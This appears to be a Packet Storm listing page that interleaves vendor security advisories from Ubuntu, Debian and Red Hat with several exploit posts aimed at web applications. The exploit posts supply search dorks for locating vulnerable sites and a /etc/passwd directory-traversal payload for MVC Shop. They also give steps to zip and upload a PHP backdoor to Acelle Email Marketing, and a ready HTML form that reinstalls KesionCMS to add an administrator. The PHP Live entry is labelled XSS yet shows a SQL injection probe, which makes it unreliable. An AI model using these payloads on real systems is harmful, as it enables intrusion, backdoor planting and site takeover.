MVC Shop version 0.5 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Directory Traversal

PHP Live version 3.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP Live 3.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://www.phplivesupport.com                                                                                     |  | # Dork      : "powered by PHP Live! "                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /message_box.php?action=submit&deptid=1 AND 3*2*1%3d6 AND 556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar Email&subject=1&x=1[+] Test : http://127.0.0.1/cestaseflorescriscombr/chat/message_box.php?action=submit&deptid=1%20AND%203*2*1%3d6%20AND%20556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar%20Email&subject=1&x=1 .Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

PHP Live 3.1 Cross Site Scripting

Ubuntu Security Notice 6149-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6149-1  
June 08, 2023

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1120-kvm      4.4.0-1120.130  
   linux-image-4.4.0-1157-aws      4.4.0-1157.172  
   linux-image-4.4.0-241-generic   4.4.0-241.275  
   linux-image-4.4.0-241-lowlatency  4.4.0-241.275  
   linux-image-aws                 4.4.0.1157.161  
   linux-image-generic             4.4.0.241.247  
   linux-image-generic-lts-xenial  4.4.0.241.247  
   linux-image-kvm                 4.4.0.1120.117  
   linux-image-lowlatency          4.4.0.241.247  
   linux-image-lowlatency-lts-xenial  4.4.0.241.247  
   linux-image-virtual             4.4.0.241.247  
   linux-image-virtual-lts-xenial  4.4.0.241.247

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1119-aws      4.4.0-1119.125  
   linux-image-4.4.0-241-generic   4.4.0-241.275~14.04.1  
   linux-image-4.4.0-241-lowlatency  4.4.0-241.275~14.04.1  
   linux-image-aws                 4.4.0.1119.116  
   linux-image-generic-lts-xenial  4.4.0.241.209  
   linux-image-lowlatency-lts-xenial  4.4.0.241.209  
   linux-image-virtual-lts-xenial  4.4.0.241.209

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6149-1  
   CVE-2023-1073, CVE-2023-1380, CVE-2023-28328, CVE-2023-30456,  
   CVE-2023-31436, CVE-2023-32233

Ubuntu Security Notice USN-6149-1

Acelle Email Marketing version 4.0.25 suffers from an arbitrary file upload vulnerability.

====================================================================================================================================  
| # Title     : Acelle Email Marketing 4.0.25 LTS unrestricted file uploads Vulnerability                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            |  
| # Vendor    : https://acellemail.com/                                                                                            |    
| # Dork      : "Acelle Email Marketing Application by acellemail.com"                                                            |  
====================================================================================================================================

poc :

[+]  Unrestricted file uploads You can upload malicious files in compressed format

[+]  Dorking İn Google Or Other Search Enggine .

[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates

[+]  Zip your backdoor And upload it.

[+]  chose web site and singup .

[+]  The method is easy and simple : You can use the HTML file to find out the upload path .

[+]  attach the file to be used with the first file and compress the two files with the ZIP extension .

[+]  So that in the HTML file we write the following code :

<!doctype html>  
<html lang="zxx">

<head>  
    
  <meta charset="utf-8">  
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">  
  <title>indoushka : PacketStorm Security</title>  
    
  <link rel="stylesheet" href="backdoor.php">

  </body>

</html>

[+] <link rel="stylesheet" href="backdoor.php"> <========| Here we write the name of the second attached file .

[+] When we upload the file and review it, we open the source code for viewing, and through the source code we know the path to upload the files and we open them

        Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |  
=======================================================================================================================================

Acelle Email Marketing 4.0.25 Arbitrary File Upload

Ubuntu Security Notice 6147-1 - Several security issues were discovered in the SpiderMonkey JavaScript library. If a user were tricked into opening malicious JavaScript applications or processing malformed data, a remote attacker could exploit a variety of issues related to JavaScript security, including denial of service attacks, and arbitrary code execution.

==========================================================================  
Ubuntu Security Notice USN-6147-1  
June 08, 2023

mozjs102 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in SpiderMonkey.

Software Description:  
- mozjs102: SpiderMonkey JavaScript library

Details:

Several security issues were discovered in the SpiderMonkey JavaScript  
library. If a user were tricked into opening malicious JavaScript  
applications or processing malformed data, a remote attacker could exploit  
a variety of issues related to JavaScript security, including denial of  
service attacks, and arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libmozjs-102-0                  102.12.0-0ubuntu0.23.04.1

Ubuntu 22.10:  
   libmozjs-102-0                  102.12.0-0ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   libmozjs-102-0                  102.12.0-0ubuntu0.22.04.1

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6147-1  
   CVE-2023-34416

Package Information:  
   https://launchpad.net/ubuntu/+source/mozjs102/102.12.0-0ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/mozjs102/102.12.0-0ubuntu0.22.10.1  
   https://launchpad.net/ubuntu/+source/mozjs102/102.12.0-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6147-1

Kesion CMS X version 2.0 suffers from an unauthenticated add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS X2.0 Reinstall Add Admin Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1.com/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.tzxdcpv.com/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Kesion CMS X 2.0 Add Administrator

Debian Linux Security Advisory 5421-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5421-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-34414 CVE-2023-34416Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bullseye), these problems have been fixed inversion 102.12.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSA8KsACgkQEMKTtsN8TjYSqBAAqZeT5wOx739rLds++dr7nw2AsHTokRdcQskPewJwqSOYY8ErKQbY5Crfre/0OXsuaq/gy0Y2+7LeAManTLl4uOzVz2wBEjWFYQ4ptLG543PzPWpbwFTlcx3HVdmtAMUrg65/eEk+m/wMFCfU3ydL3SSuT1EMjRMXGm39y2ocT3JK+CAME0ajxyHkFIbz+UjvUXnpbXTeA++O0Caexic5ACAi3GPtmFSJI1vtwI9nCCNQnQMbIWdaQ8ANOm1U1FT5Wli71M2YE8LVGIaGsavKR62DRa0Hr6omHGbmsXNRCclM6lrx7vaAt274IOghNCXYQzSd58nHw6TlshcKn7ScMpNmwYhmsSYbquk57pSNLxVU2cJEQo8V6QqoskbhnkiY0rSBKWWBzB5HiUABgYD3HHGedDJF3jhNQQNV8O0FhZq2NCCC3BDw/VdeRz2fF2LeQwc4XMP6rmJSNkc2PFETT0cKRVS4EpLJMth6lk8HVQfTeBZe0hqI8W7fwQ/T4LJa55KOFEct6p5eNG7aq5he3zOWH0BA2WwuvDA/y8M7hIUxifP92RhsevIMQDrwaMGwRb6ejme1ChHUrax+hGtBqR1ti6fNoT1jRqmJs+15JKMLQwArrWivLVNhnfMh3Tb9UEE/VdV6dKmenuCFBx5wJIMRT83wSuCIcYVtaznfZ88==wKyc-----END PGP SIGNATURE-----

Debian Security Advisory 5421-1

RenderDoc versions 1.26 and below suffer from integer underflow, integer overflow, and symlink vulnerabilities.

RenderDoc 1.26 Local Privilege Escalation / Remote Code Execution

Ubuntu Security Notice 6146-1 - It was discovered that Netatalk did not properly validate the length of user-supplied data in the DSI structures. A remote attacker could possibly use this issue to execute arbitrary code with the privileges of the user invoking the programs. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that Netatalk did not properly validate the length of user-supplied data in the ad_addcomment function. A remote attacker could possibly use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6146-1  
June 08, 2023

netatalk vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Netatalk.

Software Description:  
- netatalk: Apple Filing Protocol service

Details:

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the DSI structures. A remote attacker could possibly  
use this issue to execute arbitrary code with the privileges of the user  
invoking the programs. This issue only affected Ubuntu 20.04 LTS and Ubuntu  
22.04 LTS. (CVE-2021-31439)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the ad_addcomment function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.  
(CVE-2022-0194)

It was discovered that Netatalk did not properly handle errors when parsing  
AppleDouble entries. A remote attacker could possibly use this issue to  
execute arbitrary code with root privileges. This issue only affected  
Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and  
Ubuntu 22.04 LTS. (CVE-2022-23121)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the setfilparams function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.  
(CVE-2022-23122)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the getdirparams function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, Ubuntu 18.04  
LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-23123)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the get_finderinfo function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.  
(CVE-2022-23124)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the copyapplfile function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, Ubuntu 18.04  
LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-23125)

It was discovered that Netatalk did not properly validate the length of  
user-supplied data in the dsi_writeinit function. A remote attacker could  
possibly use this issue to execute arbitrary code with root privileges.  
This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu  
22.10. (CVE-2022-43634)

It was discovered that Netatalk did not properly manage memory under  
certain circumstances. If a user were tricked into opening a specially  
crafted .appl file, a remote attacker could possibly use this issue to  
execute arbitrary code. (CVE-2022-45188)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  netatalk                        3.1.13~ds-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
  netatalk                        3.1.12~ds-9ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  netatalk                        3.1.12~ds-4ubuntu0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  netatalk                        2.2.6-1ubuntu0.18.04.2+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  netatalk                        2.2.5-1ubuntu0.2+esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  netatalk                        2.2.2-1ubuntu2.2+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6146-1  
  CVE-2021-31439, CVE-2022-0194, CVE-2022-23121, CVE-2022-23122,  
  CVE-2022-23123, CVE-2022-23124, CVE-2022-23125, CVE-2022-43634,  
  CVE-2022-45188

Package Information:  
  https://launchpad.net/ubuntu/+source/netatalk/3.1.13~ds-2ubuntu0.22.10.1  
  https://launchpad.net/ubuntu/+source/netatalk/3.1.12~ds-9ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/netatalk/3.1.12~ds-4ubuntu0.20.04.1

Ubuntu Security Notice USN-6146-1

Red Hat Security Advisory 2023-3550-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: python security update  
Advisory ID:       RHSA-2023:3550-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3550  
Issue date:        2023-06-08  
CVE Names:         CVE-2023-24329   
=====================================================================

1. Summary:

An update for python is now available for Red Hat Enterprise Linux 6  
Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 6 ELS) - i386, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 6 ELS) - i386, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: urllib.parse url blocklisting bypass (CVE-2023-24329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2173917 - CVE-2023-24329 python: urllib.parse url blocklisting bypass

6. Package List:

Red Hat Enterprise Linux Server (v. 6 ELS):

Source:  
python-2.6.6-69.el6_10.src.rpm

i386:  
python-2.6.6-69.el6_10.i686.rpm  
python-debuginfo-2.6.6-69.el6_10.i686.rpm  
python-devel-2.6.6-69.el6_10.i686.rpm  
python-libs-2.6.6-69.el6_10.i686.rpm  
tkinter-2.6.6-69.el6_10.i686.rpm

s390x:  
python-2.6.6-69.el6_10.s390x.rpm  
python-debuginfo-2.6.6-69.el6_10.s390.rpm  
python-debuginfo-2.6.6-69.el6_10.s390x.rpm  
python-devel-2.6.6-69.el6_10.s390.rpm  
python-devel-2.6.6-69.el6_10.s390x.rpm  
python-libs-2.6.6-69.el6_10.s390.rpm  
python-libs-2.6.6-69.el6_10.s390x.rpm

x86_64:  
python-2.6.6-69.el6_10.x86_64.rpm  
python-debuginfo-2.6.6-69.el6_10.i686.rpm  
python-debuginfo-2.6.6-69.el6_10.x86_64.rpm  
python-devel-2.6.6-69.el6_10.i686.rpm  
python-devel-2.6.6-69.el6_10.x86_64.rpm  
python-libs-2.6.6-69.el6_10.i686.rpm  
python-libs-2.6.6-69.el6_10.x86_64.rpm  
tkinter-2.6.6-69.el6_10.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6 ELS):

i386:  
python-debuginfo-2.6.6-69.el6_10.i686.rpm  
python-test-2.6.6-69.el6_10.i686.rpm  
python-tools-2.6.6-69.el6_10.i686.rpm

s390x:  
python-debuginfo-2.6.6-69.el6_10.s390x.rpm  
python-test-2.6.6-69.el6_10.s390x.rpm  
python-tools-2.6.6-69.el6_10.s390x.rpm  
tkinter-2.6.6-69.el6_10.s390x.rpm

x86_64:  
python-debuginfo-2.6.6-69.el6_10.x86_64.rpm  
python-test-2.6.6-69.el6_10.x86_64.rpm  
python-tools-2.6.6-69.el6_10.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIHTWNzjgjWX9erEAQizag/9EAf1uORBaj+xe/VyJVjbtPo0kPuiswon  
rwO1kHMPcJ+tPpf2inzPClMv4Kxv2nUZGsriFN4DAhd1vqGnz3E7/S+T301nlITR  
6ppMATMObirG/IPh1LYhIcfCEpv9hDYq/VNEBSgXbyjsN+cspeVNbOZc0Uk8MMJh  
nntyPdnKdCNTipTqUTHKR3HccGaYHMbMPR1oIxzQsujmZAQnbn9+qMSXmxF1TPDq  
dvmR2UO1XmJXE1JvMbkIL9DBdq9sFfcgvXYKiiseRnD02QHWGS8QPEHOPR9sNkmK  
yGdB10C/O6Lc/UeC3ftlYagruGB4F1df+ETJpSRUB44avCbwoed+EzK8Aq1u45JD  
FtZxdtmwRFGtxwnn9B2gNXeBNWl2GY/dJ/GgPFeUHBoXFjDOKwLBFz905loSlOxe  
R2Cn6C7AHfbhws2il3YXzZgebCXIstvpTeYWN6az8KelRgtx2UfO1XiLB8uxrErd  
4GpwoWm4VklBkFZXBkmKtzZd2u/9nfx5ofQU092nYqoJWAFCXQlrtSif0Cw23m2U  
iikeyBMYxkJzuRon2ZV4ARl+enIlq8JNendj5zpmki3kP/n312K5ybKvl/WDPqk/  
y8y60Kggn906wg/MVgdTwO13IR1xFf5T6sVohp5o8wwHx1ylftRApghvMiJAE/K8  
FfdYuwaHG1g=  
=MGaY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm